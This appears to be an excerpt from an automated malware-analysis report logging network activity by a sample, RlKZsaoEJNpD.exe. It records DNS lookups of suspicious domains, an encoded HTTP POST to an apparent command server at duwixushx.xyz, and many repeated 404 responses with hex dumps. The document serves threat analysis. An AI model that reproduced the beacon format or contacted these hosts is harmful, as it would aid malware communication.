Source: global traffic DNS traffic detected: DNS query: www.soainsaat.xyz
Source: global traffic DNS traffic detected: DNS query: www.nicolemichelle.net
Source: unknown HTTP traffic detected:
  POST /fyc8/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.5
  Host: www.duwixushx.xyz
  Origin: http://www.duwixushx.xyz
  Content-Length: 219
  Cache-Control: no-cache
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Referer: http://www.duwixushx.xyz/fyc8/
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
  Data Ascii: GhEtuH=woGE44KVe1zz2sJsJDy1RWgxMfo1p5kPjJhIYVzvM8S4udMwoXYrv7+MuTa6mhmNIrR9eXP+4pEpmip0kdjDlOZUjwQlkT2KDBokGXJ9JEiBVJ+9TUDYMIIb4/QmM8uPAaeSzEgSDex+okqyh1uhJkNRXI6AXnZS5L6BCmUlMTwnSeaxfIEmpjv5/IkmlvAkeZgNiRzVQz9ZJ83Pgw==
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 04 Dec 2024 14:31:24 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 19
  Connection: close
  X-Content-Type-Options: nosniff
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9J%2Boy8JtxLUib5LByq8EBXSF4xiTD1UQfqkgnzkcB%2FBEo0n0CPB8pX7ZjQUXNlN7dBlXS4wVS5hCdzyZPP8IOxGV%2Bvf%2BvzcIBs10Pw0ppc7fIwMxVqyQk%2Fl3LZYvCGadCR6Ij6%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ecc7ff79bde42e4-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=13055&min_rtt=13055&rtt_var=6527&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 04 Dec 2024 14:31:41 GMT
  Content-Type: text/html
  Content-Length: 146
  Connection: close
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 04 Dec 2024 14:31:49 GMT
  Content-Type: text/html
  Content-Length: 146
  Connection: close
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 04 Dec 2024 14:31:56 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L5K3JaNCNdMZuzO%2FzysS2IExwivlQI3M2Q7OC4QPCUv%2BPSQlrTn6HpiuoNVXdb6Iyv2mg7f9%2FzVDvdu%2Fb48Dg%2Ff640TWSRQ78OM170OHvAihMEcbIBgvzJ93aRAjFBfK"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ecc80c07ea0431a-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:31:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VziJ2wwLAzfONIBWpdVJNOSz6p%2FRpPbEpeG0HHnLhHVZqJxGPqvNjMFVSCaF%2Fw6H28ggUgyrUfLRsdWK39X2TpQN6CxdlI8B4ykZHbu4dOcH%2FmSqE0uaKW7F4OsHmjBw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc80d10dc17c69-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:32:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7Vsc7NGA4n8k32ZoAsbwPevv50no6lWQvkG155Heu4pSJ8GF3T%2FfsAKxyLNzhA37lho8OAcXmqKqNl9uYCISyB6EoaE9HvWHsnZBcYHR3x6qXbhrTqO%2BQJeYli%2B5BOL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc80e1abfc4295-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13333&min_rtt=13333&rtt_var=6666&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1771&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:32:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXv0XkDv6GV8NH9ejLZbzSOne8aUNPi%2BrB3rpa5pcQNGtoc3cWQB%2FHM%2FxP09zwtL%2F%2F61P3H4F4NAe3cxnNAHZxaU%2F9vS9g2wz6BjJtlcLxQ3txTHWlYRUKOMNJDgOXBL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc80f33b267285-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13486&min_rtt=13486&rtt_var=6743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obGPbf5%2FgCZU2EXKF3T85S0EPaeGffiv0vGQObzmDsjtyx%2BWefqSOr%2FJTCo6WRhW7fA6qk62gOk5aH3GIXqpCnCLUNxOhULfG5I2nRrnGZyyoSn0Or0ZuLoNebI9znNqjrap30K%2FVWn4Akbw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82ba2ae74382-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=15135&min_rtt=15135&rtt_var=7567&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U38n6HSzl%2B1frqxmeiaxLCRCq8mwJ4UmeYPgrtmXUuk%2BootiumRM2XGx9aYD%2FyywcT1mXotLo%2Ba74nBovt%2BhkTwcvAL5yOC5BCgKCojzl9aFhTJVG%2FlULfaoaM7cakjUTq7HfA1sEIL0tCiu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82cb4b007c7c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2127&min_rtt=2127&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0EewMiMVQtNSCgy83Qg%2BUQhRNaGDrPSoEYTBWG98HIk8%2FnLYcz8F2TX13Juf0EH%2FwfyQok70AT%2BqrWwyWMOveqm0Tv9gI6OZGmE1jQntXPfw74rY6dbkv64A9JAet8P3STydcOIv%2B0G7Zxv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82dd0c593308-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1880&min_rtt=1880&rtt_var=940&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1807&delivery_rate=0&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1QepsJyypTd6SyQGDFv4Te9O2Bci67NIyJg1MZQhR8KcrN4ChTyHTIm0cwg1mVKqOR1hOS%2FicDonJafgnttYk38GVK221eEpgEiU5TNEK0QZfCeLRD6lt99o5AvTd4ZN9ONW%2Fazn%2FRC%2FBWR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecc82ee79e5436d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=23537&min_rtt=23537&rtt_var=11768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=499&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:32 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:35 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:37 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:40 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 04 Dec 2024 14:34:43 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-04T14:34:48.1158597Z
                Source: RlKZsaoEJNpD.exe, 00000007.00000002.3780336358.0000000005672000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nicolemichelle.net
